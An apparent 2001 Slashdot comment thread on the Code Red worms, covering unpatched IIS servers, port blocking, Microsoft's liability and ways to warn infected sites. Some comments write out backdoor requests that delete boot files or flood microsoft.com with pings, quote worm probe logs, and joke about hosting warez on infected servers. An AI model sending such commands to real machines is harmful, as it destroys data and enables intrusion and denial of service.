I'm in search of myself. If you found me before I arrive, please have me wait. -- by jsse on Wednesday May 02, @09:50PM EST#63) (User #254124 Info)

"Time's fun when you're having flies." - Kermit the Frog -- by joshyboy on Wednesday May 02, @09:31PM EST#17) (User #237516 Info)

...A no smoking section in a resturant is like having a no peeing section in a swimming pool... -- From whats been happing..... (Score:1) by SGDarkKnight on Monday May 07, @11:51AM EST#30) (User #253157 Info)

I'm in search of myself. If you found me before I arrive, please have me wait. -- Very bad case for US (Score:2) by jsse on Thursday May 17, @03:40AM EST#11) (User #254124 Info)

Swearing is the crutch of inarticulate mother fuckers. -- whitehouse.gov. IN CNAME hongkonggov.cn (Score:1) by xodiakbrad AT geeknet DOT net) on Thursday July 19, @03:45PM PDT#15) (User #95699 Info)http://www.pander.org/

If Bill Gates had a nickel for every time Windows crashed... ..oh wait, he does. -- by Nate Fox (slashdotatdafox.org) on Friday August 10, @11:00AM PDT (#54) (User #1271 Info)

-

The guy does have a point

[TheMidget]

Certain Cisco routers crash when they get a Code Red probe. Supposedly, they have a builtin webserver for configuration purposes. So unplugging/replugging the router may occasionnally be necessary.

why doesn't it stop?

[matman]

I think that a large proportion of the infected machines are the desktops of users who just installed IIS along with the rest of everything because they didn't know what they needed and what they didn't. These are boxes that don't have systems admins to patch them. I'll bet that half of these people don't even know that they have IIS installed and if they do, they don't realize that they're infected since they're files are all still there and the virus hasn't popped up a HUGE message on their screen saying "YOU ARE INFECTED".

Re:Tested, working... Effective.

[Russ+Nelson]

/root.exe?/c+del+/a+srh+/q+/f+c:\ntldr.*

Bye bye boot process...

I don't want to make the machine unbootable. I just want to disable Code Red.

-russ

Re:Microsoft should be sued

[norton_I]

A lot of people have said that other software packages can install IIS without telling the user about it.

I also don't know what the details of how to install IIS on W2KPro are, but I bet it isn't that hard to do "accidentally" -- If nothing else, I can see people just checking everything "just in case" without realizing that that meant that it would run automatically on boot.

Comment removed

[account_deleted]

Comment removed based on user account deletion

Re:Microsoft feature?

[michael_cain]

At least by hearsay, the default installation of Win2K sets the box up to run IIS. In the cable modem networks (with which I am peripherally involved), I suspect that a large fraction of the infected machines are owned by people that do not know that they are "operating a server."

MS is not alone in this type of negligence. For far too long, Red Hat Linux installations defaulted to having sendmail run, and had it configured so it would forward e-mail.

I've got a virus on my machine

[WillSeattle]

It keeps popping up these annoying ads every time I visit a web site, and leaving them under the browser window, so I have to close each one.

None of my antivirus software packages seem to be able to detect it, though ...

Re:Microsoft should be sued

[Keith+Russell]

yeah, this is true, but it is MS that has it turned on by default w/o letting the average user (which by the way is their intended target) know.

Only on server versions of NT or 2000. The average user will have some 9x mutation, which renders the point moot. No IIS, no exploit. The average 2000 user will install 2000 Professional which, while capable of running IIS, does not install it automatically. As I mentioned in an earlier post, you must go through a couple dialogs and explicitly check the IIS line item.

The only versions of 2000 that install IIS by default are all server variants. That target market damn well better know what they're getting. That won't include the average user. If they really want a web server, the sticker shock of 2000 Server will send them to Linux.

Stop addressing Code Red

[I_redwolf]

and start addressing the primary issue at hand. The issue is system administrators need to take proactive measures to make sure their systems have been patched. That's the problem and thats what needs to be addressed. There is nothing significantly fascinating about this program that deserves any noteriarty. It didn't find some weird flaw in design. It just exploits a buffer overflow which has always been a problem in peoples code. It's a really simple thing to fix at that. Enough about Code Red and more about the underlying problem.

Re:Stop addressing Code Red

[mpe]

Also, try going to the IP addresses in the log files - most of them are the "this page is under construction" default page from IIS. Looks like a web server installed as "that sounds cool", and not ever used.

Or more likely it gets installed by default and until CR came along no-one even knew it was there...

Re:Stop addressing Code Red

[ryanvm]

Stop addressing Code Red and start addressing the primary issue at hand. The issue is system administrators need to take proactive measures to make sure their systems have been patched.

Bullshit. Do you also think that someone should have to constantly replace the seatbelts in their car because they just spontaneously break?

Microsoft (or any other software company) should be responsible for selling defective products.

Re:Stop addressing Code Red

[Geoff]

The issue is system administrators need to take proactive measures to make sure their systems have been patched. That's the problem and thats what needs to be addressed.

Sysadmins aren't entirely at fault. Certainly, this particular problem has received enough coverage that there really shouldn't be any unpatched IIS installations any more (but there are, sigh), but the other side is that it's pretty near impossible to keep up with every patch to every system.

Here's a good rant on the subject entitled The Security Patch Treadmill. It was written in March 2001, before Code Red. It still applies. A quote:

Those who manage computer networks are people too, and people don't always do the smartest thing. They know they're supposed to install all patches. But sometimes they can't take critical systems off-line. Sometimes they don't have the staffing available to patch every system on their network. Sometimes applying a patch breaks something else on their network. I think it's time the industry realized that expecting the patch process to improve network security just doesn't work.

Re:Microsoft should be sued

[daviddennis]

As you must know, their own license agreement says they cannot be sued for their software, and that all you have really bought is a funny-looking silver coaster and a piece of paper or two.

This industry as a whole is a castle of sand with the tide rapidly coming in, but nobody cares to admit it.

D

Pretty devestating DoS attack in the making

[Bonker]

GET /scripts/root.exe?/c+ping+"www.microsoft.com"+"-t -l 4096 -i 9999"

Let's see just how many boxen we can get slamming MS at once...

The Code Red hype Hall of Shame

[wiredog]

From The Register

Re:Microsoft should be sued

[Syberghost]

And what do you do if your server runs third-party software that can't run with Service Pack 6?

Microsoft unfortunately has chosen to integrate IIS so tightly with the operating system, that to upgrade one is to upgrade the other.

Some folks are in a real pickle, and don't have the knowledge to get out of it in a short period of time.

Re:Code Red 'counter'

[Asgard]

DShield.org, a distributed IDS, would like you to do the following:

grep 'default.ida' access_log | mail -s 'APACHE' redalert@dshield.org

They use this information to notify the owners of the machines of the infection and to track the progression of the worm.

Re:It's not like they haven't announced the patch

[b1t+r0t]

There's also the subtle difference that flaws in Microsoft products don't kill people.

Yet.

The US Navy is giving it a good try, though.

Why people love Code Red

[Laplace]

The newsmakers love it because they get to print lots of muckracking headlines about "another hacker threat," and the "evil red chinese attack on the good guys." A scary computer virus means ratings!

Microsoft loves it because they get to release patches, and proclaim to the world "we're the good guys, protecting you from those unamerican people who share code!"

The lawmakers get shits and giggles because now they have a reason to pass new, more restrictive laws regarding comminication across "the information superhighway."

The prison system salivates over this sort of stuff. It creates more potential for 15 year old kids to be thrown in prison for essentially victomless crimes. Nothing like young ass for the seasoned prison rapists!

Open source fanatics get another nit to pick with big bad Microsoft. Go free software! No, go open source! No, go free software!

News like this is the best kind around.

Re:Why people love Code Red

[SomeoneYouDontKnow]

Are you saying that writing and distributing viruses is a victimless crime? Try telling that to someone whose system has just been wiped out.

IMHO, if the little snot-nosed 15-year-old script kiddies don't know what they're doing is wrong, then some time in the can might be just what they need. I love it when people try to excuse their behavior by saying they lack social skills and need direction to give them a sense of morality. No, these kids do what they do because they think they'll get away with it and that there'll be no consequences for them. Let them face the music. If that means some jail time, so be it.

Re:Why people love Code Red

[SomeoneYouDontKnow]

Perhaps you weren't paying attention to this thread and what I was commenting on. Read more carefully before you post.

But since you brought it up, perhaps you'll enlighten everyone here as to who's writing this stuff. And be sure to use lots of small words so we'll understand.

Re:CodeRed Information

[baptiste]

It was also mentioned yesterday that NT4 servers that have been patched are still vulnerable to CR2 if they're using redirection. This seems odd to me

Seems odd to me too since Code Red II (not CRv2) can't infect NT servers - it just crashes them when it tries to run due to a bogus jump table that only works with Win 2K.

From the Code Red II analysis: This worm, like the original Code Red worm, will only exploit Windows 2000 web servers because it overwrites EIP with a jmp that is only correct under Windows 2000. Under NT4.0 etc... that offset is different so, the process will simply crash instead of allowing the worm to infect the system and spread.

So hard to keep up

[snakecoder]

God, I'm still on version 1 of code red. Does anybody know where I can download the latest version? Is there a mail list I can get on so I know I have the lasted version on my IIS server?
Tnks.

Re:Microsoft should be sued

[djocyko]

To my knowledge, Microsoft didn't even try to mass-mail the patch to their registered customers who might be affected.

From: Support@iis.microsoft.com
To: Registered_Users@iis.microsoft.com
CC:
Subject: RE: IIS Code Red Worm Patch
Attachment: Instructions.doc
Body:

Hi, how are you?

We are writing you in response to the Code Red worm that has recently attacked our premium enterprise gold standard web portal system, Microsoft Internet Information Server. We have compiled a set of directions for patching the server, and have included these instructionsin a easy to read Word document. If MS Outlook didn't automagically open this attachment for you, double click on the attachment link above.

If you have any advice on this file, please email us back!

See you later!

Re:Buffer overflow vulnerabilities

[mpe]

The buffer overflow we're talking about is not in an OS kernel (Windows), but in an application (the IIS webserver), for chrissakes!

How big a distinction does Microsoft draw between "kernel" and "application" anyway? After all they are always on about "integration"...

Re:Perhaps REAL Damage will Fix the Problem

[mpe]

What we really need is a variant of Code Red that compleatly hoses any computer that it hits -- something that people can't overlook.

It can't do this too quickly or it wouldn't get that many of them. Also people would just reformat and reinstall. "Evolution" dosn't work very well with "reincarnation" :)

Re:Microsoft should be sued

[IronChef]

I'm a gun nut, but even I will say that a maker of a defective gun should be liable. If it explodes in your hand, that's an issue. IIS is exploding in a way, and MS should be liable.

My view is very simple: Things you buy shouldn't suck.

Re:Back Door? Somebody call the Goatse.cx guy!

[Tackhead]

>My question here is, how the hell do you have a 'wider' backdoor than that?!

Well, suppose we had this giant electronic speculum ;-)

Code Red Cannot Be Stopped

[(void*)]

Kyle Reese: This code red virus, It's out there, looking for your IIS server. It feels no passion, no sympathy or remorse. It can't be bargained or reasoned with. It's just going to come for you, unless you can stop it yourself.

Re:Buffer overflow vulnerabilities

[jilles]

Ah coding practices. Sorry, Murphy's law you know. If it can go wrong it will go wrong (and he porves himself right a lot lately). That's why even prorgams that have been around since the early days of UNIX are sometimes caught with their pants down (recent BIND bug anyone).

Any manual check can be forgotten and be a potential security hole. Once it is forgotten it merely depends on who finds the hole first: script kiddie or code maintainer.

And lets rub this in deeply, there are plenty of languages that protect you against the single most frequent cause of security leaks that is costing the world billions of dollars in damage annually (and it sure isn't C). Any program that is going to be exposed to hackers (i.e. any internet server software) should never ever be programmed in C. You simply cannot guarantee that the compiler and libraries are correct. Even if your program is correct, those still can be a potential source of bugs. Your average UNIX system likely has dozens of undiscovered potential buffer overflows.

Us java programmers are laughing our asses of each time a buffer overflow is wreaking havoc on the internet. We don't have to worry about such things. Java may not be the greatest thing, but you can rest assure that buffer overflows won't happen.

Re:As with the parent, so with the child.

[pmorrison]

True... and the Code Red Resource Kit, the Code Red SDK, 'Programming Code Red', 'Inside Code Red', and, through IDG, 'Code Red for Dummies'!

Could this be it?

[ecki]

Found a lot of those in my access.log...:

NN.NN.NN.NN - - [10/Aug/2001:04:11:20 -0700] "GET / HTTP/1.0" 200 7023
NN.NN.NN.NN - - [10/Aug/2001:04:11:20 -0700] "GET /753f7d950154aaec...1cc7 HTTP/1.0" 404 258
NN.NN.NN.NN - - [10/Aug/2001:04:11:20 -0700] "GET /scripts/root.exe HTTP/1.0" 404 210
NN.NN.NN.NN - - [10/Aug/2001:04:11:21 -0700] "GET /MSADC/root.exe HTTP/1.0" 404 208
NN.NN.NN.NN - - [10/Aug/2001:04:11:21 -0700] "GET /c/winnt/system32/cmd.exe HTTP/1.0" 404 218
NN.NN.NN.NN - - [10/Aug/2001:04:11:25 -0700] "GET /d/winnt/system32/cmd.exe HTTP/1.0" 404 218
NN.NN.NN.NN - - [10/Aug/2001:04:11:26 -0700] "GET /NULL.ida?http-42.AAAAAA...AAAAAAAAA=X HTTP/1.1" 404 214
NN.NN.NN.NN - - [10/Aug/2001:04:11:29 -0700] "GET / HTTP/1.0" 200 7023
NN.NN.NN.NN - - [10/Aug/2001:04:11:30 -0700] "GET /NULL.idq?http-42.AAAAAAAA...AAAAAAAA=X HTTP/1.1" 404 214
NN.NN.NN.NN - - [10/Aug/2001:04:11:33 -0700] "GET / HTTP/1.0" 200 7023

Or is there somebody trying to exploit the CodeRed backdoors? Mind you, this is within a supposedly protected firefall.

I feel so left out...

[Maditude]

Ever since Mediaone/AT&T started blocking port 80 (as of 2am last Monday here in Minnesota), I've been jealously watching you guys get to have all the fun.

On the bright side, I have gotten acknowledgement from RRcustomercare (Mediaone/ATT/RR/pick one fscking name already!) that yes, technically it is okay to run a server as long as you don't negatively impact others. Then again, they are still saying that until this worm dies out, none of their customers will be seeing any incoming packets on port 80. :-(

One problem....

[JohnTheFisherman]

People need to patch servers that don't know they're servers. I have RoadRunner (cable modem), and I looked at my logs, and decided to try and track a few people down via http://ipattackingme. Almost none of them had a website up - just the stock 'page under construction.' So I suspected (and RR tech suppt. confirmed this) that most of these people are running IIS and DON'T KNOW THEY'RE RUNNING IIS.

RoadRunner is additionally trying to shut down individual cable modems, rather than some of the more extreme measures other providers are using (like killing port 80), so kudos to them. Please get the word out to anyone running 2K or NT to check their box, not just anyone who KNOWS they're running a website.

Re:One problem....

[barneyfoo]

Ahhhhhhh.... so THAT'S how microsoft is increasing its IIS share on netcraft.com. Interesting :)

Re:It's not like they haven't announced the patch

[Have+Blue]

There's also the subtle difference that flaws in Microsoft products don't kill people.

less talk...more help

[jcw2112]

I spent a couple of hours yesterday sending out emails to just about everyone that hit my box at home. Just toss the IP into a browser and get some contact info from the site that comes up (if one does come up). I got MANY replies thanking me for finding that "hidden" box on their network.

And no, this isn't the time to send off an email that says "ditch your M$ crap and goto apache" because most of these poor admins aren't running IIS because they WANT to...it's what they HAVE to do.

So let's take back some bandwidth already!

Re:Microsoft should be sued

[Keith+Russell]

...I still think Microsoft is guilty here because their customers weren't aware their Windows-running boxes could start chewing up bandwidth...

If you are a sysadmin responsible for any server, regardless of operating system, it's your job to be aware. Microsoft's poor record may drive up the frequency of patches, but that doesn't change the fact that the difference between a good sysadmin and a bad one is the knowledge that no server runs itself.

Perhaps REAL Damage will Fix the Problem

[Bilbo]

Root problem here is NOT so much the fact that MS makes buggy servers. Let's face it. Any software can have bugs. MS DID release a patch.

The problem is freaking clueless users installing web servers and then not maintaining them!

What we really need is a variant of Code Red that compleatly hoses any computer that it hits -- something that people can't overlook. Then and only then will the clueless twits running these servers get the idea that they have to be responsible when they expose themselves to the Internet.

Any volunteers?

Re:Copycats

[Syberghost]

Get over it. Code Red is dead.

The folks here at the Fortune 500 company I work for who have been working around the clock since Wednesday trying to clean up this mess will be real happy to hear that you don't believe it exists.

Re:Bah.

[Syberghost]

FYI, there appears to be some differences in the terminology between versions, and at least one major AV vender *cough*McAfee*cough* has crucial details wrong.

What CERT calls "Code Red II" is the third iteration, and that's what hit us. Some others are calling it III, and McAfee claims II doesn't run on NT. Which is bullshit.

Re:More info?

[loraksus]

http://loraksus.d2g.com/access.log
There, seems that there are lots of dumb asses in my IP range.

Re:Bah.

[MeowMeow+Jones]

Or you could just disable the isapi mapping to .ida extentions in IIS (and everything else you don't intend to use) Just right click on "Default Web Site" in MMC and you should find it pretty quick.

Use Open Source to Fight Code Red

[isn't+my+name]

Tom Liston came up with a cool idea for slowing Code Red and other TCP port scanners. He didn't have the bandwidth to host it, and I offered. So, this is a shameless plug, but if we can get enough of us doing this and get some press coverage, it's a great story that shows the power and speed with which open source solutions can be implemented. He first posted the idea on 7/31 just before Code Red started heating up again. Using the Trinux (http://www.thrinux.org) linux distribution, he cobbled together a floppy boot image that, with unused ip addresses and an old machine, can be used to slow the scans by responding to the initial TCP three way handshake and then ignoring everything else. The automated scanner has to time out before that thread can move on. According to reports on the SANS Intrusions discussion list, it seems to slow all variants of Code Red and on RPC scans as well. His announcement of LaBrea is at: http://www.incidents.org/archives/intrusions/msg01 368.html

Re:ok you bigots :)

[baptiste]

That's Code Red II, released in teh wild Aug 4th. CRv2, the second variant of the original worm hit July 19th and again on Aug 1st. The ORIGINAL Code Red hit in early July - had a crappy IP gen routine and made little to no news cause it didn't go very far.

Re:Linux to the rescue?

[Rimbo]

"Technically illegal?"

I don't know...is it illegal to use an open port on a machine if the person doesn't intend for us to use that port?

Let's say I leave port 80 open on my machine...unintentionally...and furthermore in such a way that private, confidential information can be seen and downloaded. If someone tries to read a web page or surf my now-open web browser, have they really broken any laws?

I don't think so. Because I'm the one who left the damned thing open.

An interesting thing about your comment is that perhaps Code Red II was built by white hats in the first place just for this reason -- to open up a back door on all of these folks' machines so that they could do just that. The US government protecting itself? Microsoft doing damage control? Blackhats? Who knows?

I think that if someone broke a hole in the wall of my house while I was on vacation, and someone came by and went inside my house just so that they could repair that hole, I would be grateful. I certainly wouldn't press charges.

Re:You know...

[pmz]

Just write a new version that infects IIS, shuts it off, installs a better web server, and voil&agrave, the world is a better place! It would be even better to uninstall IIS, but we all know it's impossible to uninstall Windows software.

Use clear English.

[Futurepower(tm)]

Use clear English when you send messages to non-English-speaking countries. Otherwise there is little chance you will be understood.

Something like: "Your computer has the Code Red virus! It attacked my computer. See http//www...."

Include a link to a site which explains how to fix the problem.

As with the parent, so with the child.

[pmorrison]

It usually takes Microsoft 3 releases to get it right. So, when can we expect Code Red .Net?

Saddens me though

[Hammer]

That Linux and Apache are not compatible.
We seem to have a good ways to go befoer everything that runs on Winblows will also run on Linux :-))

Code Red XP

[JiveDonut]

Lets' skip ahead of Code Red IV. I think we should utilize .NET to build a super worm. We'll call it Code Red XP.

What kind of features should we add? Other than the obvious: Remove Windows and install something else.

It's not like they haven't announced the patch

[mblase]

Remember the recent Ford Explorer/Firestone fiasco? Firestone made a bunch of flawed tires (when and where is not important here) that were put on these Explorer SUVs, which in some cases fell apart and came off the wheel when driving at high speeds. Investigations were made, and eventually Firestone had to issue a complete recall of the tires.

The media talked about it for weeks. Ford sent out letters to customers as far as they could find them. People brought their SUVs in, got new tires put on them, drove out. That's how product recalls usually go.

Software patches aren't all that different. When a hole is discovered, a patch is made. Responsible Microsoft server administrators have the MS site automatically checked on a daily basis for critical updates and patches. Irresponsible admins don't bother, and they become vulnerable and the cause of the worm's spread.

But it would be insane to propose MS should force-feed this server patch to all their customers. The problem isn't the software, it's the admins. You'd be hard-pressed to find a major newspaper in the civilized world that hasn't mentioned this worm yet, and still there are people who don't bother to patch. They're the same ones who think that server software is just like desktop software, where you're the only one who uses it that really matters.

Firestone couldn't make its customers bring their SUVs in to have the tires replaced for free, and there's no way the customers could claim ignorance of the problem after the press got done with it. Likewise, Microsoft can't make its customers upgrade their software for free. They've honestly tried to make all their server customers aware of what's expected of them, but they're as powerless to force it to happen as Firestone is to force car drivers to rotate their tires every 6,000 miles.

Re:It's not like they haven't announced the patch

[rebelcool]

Hm, well to design such a system as those you would need to know how to design a really good real-time system. And if you know how to do that, you're not a 'stoopid mcse'.

Kinda like asking my mom to design a car engine...

Re:It's not like they haven't announced the patch

[Syberghost]

There's also the subtle difference that flaws in Microsoft products don't kill people.

Don't be so sure; there are Microsoft products in use on the space shuttle, the space station, and Navy warships.

Even if they're just pushing data around, bad data in those environments can result in death.

Microsoft feature?

[sjonke]

Noticing code red scanning my OS X Mac, I contacted the owner of the offending machine (actually the net admin on which the machine resided) and found out that the user of the computer (a portable) did not even know that he was running IIs.

So doesn't that mean Microsoft was lying?

[Myself]

When Microsoft said that customer data wasn't exposed during the Hotmail infection, wouldn't that seem to contradict what we know about the worm?

Re:make some money off banner ads

[TheMidget]

> host banner ads on your server with the file name of /default.ida.

Won't work. The worm won't follow redirects nor download any pictures (banners) from the page.

Code Red is trying to eat me!

[sgt_getraer]

So I get a call from my ISP Verizon yesterday. They ask me if I have been having problems with the Code Red virus.

"Nope, but my service is shot to hell. You guys must be having some serious problems."

The representative goes on to tell me that I can 'fix' the code red virus by unplugging my router and plugging it back in. I try, vainly, to inform him that the virus is doing nothing to my hardware and the reason I'm having problems is that it's making swiss cheese of the SERVERS...

Anyway, the guy finishes his script and hangs up. So is Verizon trying to cover up their ineptness by implying that the customer is infected, and not them? Proactivly trying to shift the blame to get less tech support call? Very strange indeed...

Re:Code Red is trying to eat me!

[garcia]

They probably understand the fact that there is VERY little that they can do (other than blocking port 80) than inform their users of what to do. At least they are giving "Worm? I have a worm in my computer? There's no dirt in there" guys the information.

As much as I hate Verizon and their bullshit, at least they are trying to do something.

Gotta give em SOME credit ;)

Re:Code Red is trying to eat me!

[BeBoxer]

Code Red will crash some Cisco 675 DSL routers. That's probably why they are calling.

Re:Code Red is trying to eat me!

[b1t+r0t]

If your router is a Cisco and hasn't had a firmware upgrade in the past six months or so, it may have a crashing bug that can be triggered by Code Red's exploit. But if you have _any_ service, this is not the problem, and the guy who called you was a total idiot.

Re:Microsoft should be sued

[norton_I]

The difference between guns and windows is that guns do damage when working as designed. A gun is designed to destroy things you point it at, and that is what it does. It can be used legally or illegally, and manufacturers really can't do much about it.

IIS is causing damage because of a design flaw. If you bought a gun and it blew up in your hand due to a design flaw, the manufacturer would certainly be at fault.

I am not convinced that MS should be lible for this, I am just saying that your analogy is flawed, and that in the world of physical products, MS would be hit with a billion dollar lawsuit right now.

huh .. when does the prequel come out ?

[freaker_TuC]

They should have started with version IV instead of I ...

then they could do some prequels 10 years later ...

codered IV: A new hope
codered V: The code strikes back
codered VI: Return of the code

...

codered I: The iis menace.

Re:Oddly enough...

[starseeker]

That's because car safety has emotional and financial strings attached. You don't see people getting truly upset about computers unless it is either costing them money in a way they can understand easily, or kids are getting into trouble. The issue of poor software design isn't one people can readily understand, just as a physical intruder is easier to understand than an electronic one.

Version 3? Don't think so.

[Todd+Knarr]

My suspicion is this is Code Red 2. One of the AV companies used "CodeRed.v3" or something similar to refer to Code Red 2, and I'd bet the journalists were just too clueless to figure out that the two names refer to the same thing.

Re:Version 3? Don't think so.

[grytpype]

Oh, so that's why Slashdot sucks so much. Thanks for the info.

Re:Version 3? Don't think so.

[EvlG]

Read the /. FAQ. Taco speaks directly to your concern about verifying stories.

Essentally, it is something like Taco sees /. as different from other media, in that readers verify and expound on the stories. /. merely reports the story, with some sanity checking (like not reporting something without even a link). What happens after that is up to the readers.

Re:and another thing...

[norton_I]

I don't have any objection to ISPs doing that *by default*. I just think they should be able to selectively unblock that for customers who want it, with the stipulation that if you or your computer do bad things with it (like get code red) they will shut of access completely until you fix it.

@Home just unilaterally shut of all port 80 access (they have had netbios ports shut off all along, I believe).
Sure I can move my web server to port 81 or 8080, but as a responsible netizen, it pisses me off that I have to.

And don't whine about me using your bandwidth. I use my web server for personal use, on a service I paid for. It probably uses a whole 100 KB/day. If ATT@Home can't handle that, they need to upgrade their pipe.

Re:More info on Code Red III

[V50]

The sad thing is, awhile ago one of my Mom's friends, the type who can't understand there is more to a PC than C:\WINDOWS\DESKTOP\, got one something like this in the mail.

She forwarded it on to everybody she knew, genuinly panicked, wondering how it could do all that, beliving every word...

Re:Not SYSTEM-level access....

[SydBarrett]

"But Code Red II created virtual drives which allowed you to access cmd.exe directly via a corrupt explorer with root rights. So it had a pretty large back door to begin with - I look forward to the analysis of Code Red III if such a thing exists."

You sure about that? A friend of mine got infected (it's gone now) and told me about it. Just for kicks, I tried the exploit on him. Nothing dangerious, and I let him know in advance what I was doing. When I tried to do a simple "Copy file1 file2", I got a access denied error. Maybe I was doing it wrong, or something. Still, it was fun seeing everything on his hard drive. Anything that was text could be viewed with "type filename", dispite missing headers. Hell, with a web server log of infected machines and a port scanner to see if port 80 is still running, you can have lots of fun sneaking around.

Note: The last part is true with a lot of servers in Japan.

Re:Microsoft should be sued

[Keith+Russell]

I bet it isn't that hard to do "accidentally"

Actually, it is. You are never offered the option during the initial installation (i.e. the moment you boot from the CD). You must wait until the entire installation is finished, then select "Add/Remove Windows Components" from the Add/Remove Programs control panel. From there, IIS can be selected. It is not selected by default.

Re:An ETHICAL way to Anti-Virus

[FatOldGoth]

I'd like to automate this process and generate a "form" email, filling in the relevant details, but I'm not sure how to cause a script to be invoked by a change in the Apache log, except to maybe run a 5 minute cron job that grabs all the Code Red attacks and then renames the log file.

I've done something like that already. It actually picks out any entries in the log from the last hour and mails the originators, rather than tailing the log. Help yourself.

Obviously,IIS is *vastly* more popular then apache

[Jerf]

They quote a columnist for Microsoft's TechNET who makes the false claim that IIS is more popular than apache, and attributes the widespread exploits to that (false) popularity!

More popular with whom? If there's anything these worms have shown us, it's that there's a HELL of a lot more IIS installations then anybody would really have guessed, due to the ease of installing it without even realizing it with Windows 2000.

IIS and Apache may be roughly comparable for "real" websites, but in terms of sheer number of installations, I'd now bet that IIS is creaming apache.

Before you get too huffy, note this is a bad thing, as it has provided a fertile breeding ground for these worms, while providing little-to-no benefit in return.

"More lusers with vulnerable web servers then ever before - Microsoft Windows 2000."

Like a Movie ...

[mlati]

I wonder when Rocky ..uh ..Code Red IV will be released?

More uninformative article ever

[AdamInParadise]

Well, this article is just empty. It just says "There is a Code Red III" and that's it...

Someone should post the IP addresses.

[Mustang+Matt]

At first I strongly disagreed with writing an anti-virus that would spread the same way disabling the holes, but shoot after the third edition of this virus, I say post the IPs and let everyone have fun with the servers.

An ETHICAL way to Anti-Virus

[Slur]

Hi,

I've been watching my Apache log as I get hit about every 10 minutes by Code Red. For each source IP address I've been doing a reverse lookup and if successful then notifying the webmaster of the source domain about the infected computer on their network.

I'd like to automate this process and generate a "form" email, filling in the relevant details, but I'm not sure how to cause a script to be invoked by a change in the Apache log, except to maybe run a 5 minute cron job that grabs all the Code Red attacks and then renames the log file.

An example of the email I've been sending is this:

Hi,

Just a note to let you know that a copy of the Code Red virus is on your network attacking my web server. The source IP address is: 207.151.xxx.xxx which a reverse lookup shows as xxx.xxx.gdsl.nwc.net . If this is a customer on your network then please pass on to that individual that they need to reboot their NT/W2K server and possibly reinstall their OS. They will also need to get a patch from Microsoft to correct this vulnerability.


This is probably a very miniscule thing to do, but it does - in a way - inoculate against the virus, at least on consumer DSL networks, and in a manner that is both ethical and - like a virus - fairly contagious. I've heard a lot of buzz in places like Slashdot about making an "anti-virus" but why haven't I heard this kind of thing suggested before?

Bah.

[austad]

I'm unable to find anymore info on it. Until I see a more comprehensive story, I'm chalking this one up as a gullible journalist (that's redundant) who reports on rumors.

I haven't noticed anything different in my logs, and I probably should have by now as I've been seeing over 20,000 attempts per day. All are still "NNNNNNNNNN....." (of course, this might be the same with CR3).

Re:Bah.

[mjh]

I've got entire projects sitting dead in the water because one server relies on one piece of third-party software that can't operate with Service Pack 6a, and so can't be brought up until they find a solution.

You might be interested in this article titled, "Securing an unpatchable webserver"

Re:Bah.

[Syberghost]

No, this fun new version is "XXXXXXXX".

And the only thing I saw wrong in that report is that they believed the companies in question when they reported "isolated" problems that have already been fixed.

I've got entire projects sitting dead in the water because one server relies on one piece of third-party software that can't operate with Service Pack 6a, and so can't be brought up until they find a solution.

The pisser is none of MY servers were affected, but I'm still dead in the water because of a bunch of idiots on other teams and projects.

interesting thing about whitehouse.gov

[Ryu2]

Have you noticed that they are using Akamai now to distribute the content of whitehouse.gov? I guess it's so that they can't be DDOSed in the future with a variant of Code Red (changing the IP address of whitehouse.gov was only a stopgap measure).

Re:Code Red IV?

[radja]

what do you think we are..? german lawyers?

//rdj

And the astroturfers sang a new song.

[Black+Parrot]

Last year the astroturfers' chorus was "Who do you sue when something goes dreadfully wrong?"

Well, something has gone dreadfully wrong. Where are all the lawsuits? Where are all the astroturfers gleefully pointing out that Microsoft's products are better than OSS products, because you can sue Microsoft for your troubles now?

Re:Follow-up viruses?

[ncc74656]

What's to keep someone from writing something that exploits this, looking for boxes that have been patched, and removing the patch - re-enabling the vulnerability to CR? Or surreptitiously opening additonal services? Or hell, simply executing del (is that the command in DOS?) c:\?

NT and Win2K aren't DOS, but DEL is in there. DELTREE is also in NT IIRC, but it isn't in Win2K (not that it'd be hard to copy over Win98's DELTREE and use that).

An infected server sounds like the ideal place to throw up a warez/pr0n/mp3z site on someone else's nickel...use ftp.exe to fetch a batch file that then builds a directory structure and pulls the files (or "filez," since it's that kind of site) over. If they're too stupid to have patched against CodeRed2, they're probably too stupid to check their logs to find out why their available bandwidth has apparently shrunk to nothing. It'd be an interesting idea to try out, if I had no sense of moral inhibition and/or didn't think I'd get caught. :-)

Besides, if it's the site of a company you don't particularly like, imagine what would happen if the SPA or BSA came knocking and found Office XP ISOs available for download at http://www.fubared-company.com/warez...

Code Red infection in spite of patch

[shibut]

At work we have a M$ w2k brand new server (installed the last week of July). The server was patched before August 1 and did not have plain vanilla CR. Nevertheless, on Sunday August 6th we still got semi-infected with CRII. I say semi infected since it totally ruined our server's ability to function properly but did not try to infect other machines. When our IT support guy called M$, they claimed we should re-install the patch but went to great lengths to make us re-download the patch from a url they specified (instead of using the patch file we had downloaded at the end of July). This makes me think that maybe they improved the patch since then. Re-installing the patch solved some of the problems and the rest our IT guy had to fix manually.

We've been CR-free for 2 whole days now

For the record: I wanted a Linux server but the guys at work (I'm a gal) didn't want to give up the potential to share calendars (they don't actually use it at the moment but options have value on paper at a VC firm...).

Help me out on this one...

[mystery_bowler]

I understand that Code Red is a worm, but I wish I had more of an understanding of how it really works and what it is really doing. Anyone got a good explanation or link to an explanation?

Re:Help me out on this one...

[Tony-A]

What kind of server buffer handler would execute the content of the buffer? You have to go out of your way doing stupid things to make it happen. Who are these morons at Microsoft who write that kind of code?
Flippant answer. The kind that win benchmarks. Anything that reserves reasonable amounts of memory for variable-length things and cannot or does not insure that nothing spills outside its limits has this kind of problem, and that's most everything, not just Microsoft. Note that the real problem is not the exploits, it is the unnoticed cases where innocent input corrupts logically unrelated data.

Re:Help me out on this one...

[DeadMeat+(TM)]

Code Red takes advantage of what's called a "buffer overflow" in Microsoft's IIS web server software.

What happens is that IIS sits there, waiting for Web browsers to request pages. A Code Red infected server starts randomly picking other computers on the Internet or the network, and requests them to send a Web page called default.ida. It then passes a huge parameter to default.ida.

Apparently, default.ida has hard-coded a maximum length for parameters -- say, 200 letters. (Probably not actually 200 -- but you get the idea.) That's what all the XXX and NNN's are there -- it's the 200 (etc.) letters that's the most default.ida is expecting to receive. A buffer overflow is when something goes past that maximum number of letters, and a program with a buffer overflow problem usually does something strange with the information past that point -- in this case, default.ida takes everthing after that number of letters and runs it like it were a program.

Normally, this would just crash IIS (since it's getting a bunch of garbage, and running garbage makes programs crash) but Code Red is purposely designed so after the right number (200 or whatever) of XXX/NNN's, it tacks on the code to infect the computer with Code Red. So, IIS runs the code, the computer becomes infected with Code Red, it starts trying to spread it to other computers, and the whole cycle starts all over again.

Serious blow to open source & free software

